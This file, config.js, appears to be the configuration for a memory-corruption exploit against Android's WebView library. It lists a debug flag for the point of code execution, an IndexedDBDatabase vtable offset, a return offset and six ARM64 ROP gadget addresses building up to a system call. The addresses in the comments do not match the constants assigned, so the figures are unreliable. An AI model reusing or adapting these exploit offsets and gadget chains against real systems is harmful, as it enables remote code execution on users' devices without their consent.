config.js

/*
 *  Flag to crash on a controlled address once we get code execution,
 *  instead of jumping into the first ROP gadget.
 */
const debug = false;

/*
 *  IndexedDBDatabase vtable offset in libwebviewchromium.so.
 */
const OFFSET_VTABLE = 0x512f240n-0x2000n;

/*
 *  Offset of the following instruction in libwebviewchromium.so:
 *  <content::IndexedDBDatabase::ProcessRequestQueue()+88>: ldr x8, [x21]
 */
const OFFSET_RETURN = 0x23a5d8c

/*
 *  Offsets of the following gadgets from libwebviewchromium.so:
 *
 *    G1: 0x49bf59c : ldr x8, [x0, #0x48]! ; ldr x1, [x8, #0x100] ; br x1
 *    G2: 0x1df7f8c : ldr x9, [x8, #0x190] ; ldr x6, [x8, #0x80] ; blr x9
 *    G3: 0x3e7a4b0 : ldr x20, [x0, #0x68] ; ldr x9, [x8] ; mov x0, x8 ; ldr x9, [x9, #0xf8] ; blr x9
 *    G4: 0x3f9152c : ldr x2, [x0, #0x18] ; ldr x0, [x0, #0x38] ; br x2
 *    G5: 0x2fbf400 : ldr x8, [x8, #0x10] ; blr x8 ; ldr x8, [x20, #0x3b8] ; cbz x8, #0x2fbf424 ; blr x8
 *    G6: 0x3f0fd88 : ldr x5, [x6, #0x28] ; ldr x4, [x6, #0x20] ; ldr x3, [x6, #0x18] ; ldr x2, [x6, #0x10] ; ldr x1, [x6, #8] ; mov x8, x0 ; ldr x0, [x6] ; svc #0 ; ret
 */
const G1 = 0x49bcd8cn;
const G2 = 0x1e5b008n;
const G3 = 0x3f8a734n;
const G4 = 0x40a8824n;
const G5 = 0x3085310n;
const G6 = 0x402096cn;